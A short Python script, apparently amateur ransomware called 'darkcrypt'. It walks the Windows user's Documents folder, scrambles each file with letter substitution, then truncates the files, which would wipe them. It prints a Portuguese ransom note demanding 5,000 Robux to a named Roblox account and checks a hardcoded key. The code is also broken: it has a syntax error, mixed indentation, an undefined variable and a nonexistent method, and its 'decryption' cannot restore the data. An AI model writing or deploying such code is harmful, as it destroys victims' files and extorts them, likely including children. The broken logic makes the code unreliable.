import os
user = os.getlogin()
os.chdir("c:/users/"+user+"/documents")
files = os.listdir()
quant = len(files)
for i in range(quant):
    with open("c:/users/"+user+"/Documents/"+files[i],"r+") as file:
	    crypto = file.read()
	    crypto = crypto.replace("q", "m")
	    crypto = crypto.replace("w","n")
	    crypto = crypto.replace("e","b")
	    crypto = crypto.replace("r","v")
	    crypto = crypto.replace("t","c")
	    crypto = crypto.replace("y","x")
	    crypto = crypto.replace("u","z")
	    crypto = crypto.replace("i","ç")
	    crypto = crypto.replace("o","l")
	    crypto = crypto.replace("p","k")
	    crypto = crypto.replace("a","j")
	    crypto = crypto.replace("s","h")
	    crypto = crypto.replace("d","g")
	    crypto = crypto.replace("g","f")
	    crypto = crypto.replace("d","f")
	    crypto = crypto.replace("Q", "M")
	    crypto = crypto.replace("W","M")
	    crypto = crypto.replace("E","B")
	    crypto = crypto.replace("R","V")
	    crypto = crypto.replace("T","C")
	    crypto = crypto.replace("Y","X")
	    crypto = crypto.replace("U","Z")
	    crypto = crypto.replace("I","Ç")
	    crypto = crypto.replace("O","L")
	    crypto = crypto.replace("P","K")
	    crypto = crypto.replace("A","J")
	    crypto = crypto.replace("S","H")
	    crypto = crypto.replace("D","G")
	    crypto = crypto.replace("G","F")
	    crypto crypto.replace("D","F")
	    file.write(crypto)
	    crypto = crypto.replace("m", "q")
	    crypto = crypto.replace("n","w")
	    crypto = crypto.replace("b","e")
	    crypto = crypto.replace("v","r")
	    crypto = crypto.replace("c","t")
	    crypto = crypto.replace("x","y")
	    crypto = crypto.replace("z","u")
	    crypto = crypto.replace("ç","i")
	    crypto = crypto.replace("l","o")
	    crypto = crypto.replace("k","p")
	    crypto = crypto.replace("j","a")
	    crypto = crypto.replace("h","s")
	    crypto = crypto.replace("g","d")
	    crypto = crypto.replace("f","g")
	    crypto = crypto.replace("f","d")
	    crypto = crypto.replace("M", "Q")
	    crypto = crypto.replace("M","W")
	    crypto = crypto.replace("B","E")
	    crypto = crypto.replace("V","R")
	    crypto = crypto.replace("C","T")
	    crypto = crypto.replace("X","Y")
	    crypto = crypto.replace("Z","U")
	    crypto = crypto.replace("Ç","I")
	    crypto = crypto.replace("L","O")
	    crypto = crypto.replace("K","P")
	    crypto = crypto.replace("J","A")
	    crypto = crypto.replace("H","S")
	    crypto = crypto.replace("G","D")
	    crypto = crypto.replace("F","G")
	    crypto = crypto.replace("F","D")
	    file.seek(0)
	    file.truncate()
	    file.close()
	indice += 1
print("parabens voce foi infectado por darkcrypt!")
print("todos os seus aqrquivos foram criptografados e estão indecifraveis")
print("mande 5 mil robux para conta Bre4837no via please donate e vou liberar via roblox a chave de descriptografar o ransomware")
while True:
	UserInput = input("chave :")
    if UserInput=="tree1234":
		print("certo!")
		for i in range(quant):
                with open("c:/users/"+user+"/Documents/"+files[i],"r+") as file:
				crypto = crypto.replace("m", "q")
	            crypto = crypto.replace("n","w")
	            crypto = crypto.replace("b","e")
	            crypto = crypto.replace("v","r")
	            crypto = crypto.replace("c","t")
	            crypto = crypto.replace("x","y")
	            crypto = crypto.replace("z","u")
	            crypto = crypto.replace("ç","i")
	            crypto = crypto.replace("l","o")
	            crypto = crypto.replace("k","p")
	            crypto = crypto.replace("j","a")
	            crypto = crypto.replace("h","s")
	            crypto = crypto.replace("g","d")
	            crypto = crypto.replace("f","g")
	            crypto = crypto.replace("f","d")
	            crypto = crypto.replace("M", "Q")
	            crypto = crypto.replace("M","W")
	            crypto = crypto.replace("B","E")
	            crypto = crypto.replace("V","R")
	            crypto = crypto.replace("C","T")
	            crypto = crypto.replace("X","Y")
	            crypto = crypto.replace("Z","U")
	            crypto = crypto.replace("Ç","I")
	            crypto = crypto.replace("L","O")
	            crypto = crypto.replace("K","P")
	            crypto = crypto.replace("J","A")
	            crypto = crypto.replace("H","S")
	            crypto = crypto.replace("G","D")
	            crypto = crypto.replace("F","G")
	            crypto = crypto.replace("F","D")
	            file.seek(0)
	            file.truncate()
	            file.exit()
	    exit()  
	  else:
		  print("errou!") 
          exit()
